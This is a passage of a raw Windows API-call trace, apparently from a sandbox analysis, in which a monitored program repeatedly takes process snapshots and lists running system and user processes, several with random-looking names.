Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.661] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.662] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.668] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.672] CloseHandle (hObject=0xbc) returned 1 [0102.672] Sleep (dwMilliseconds=0x12c) [0103.035] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0103.040] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.049] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.052] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.053] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.054] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.055] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.132] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.148] CloseHandle (hObject=0xc4) returned 1 [0103.148] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0103.155] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.155] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.158] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.161] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.164] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.165] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, 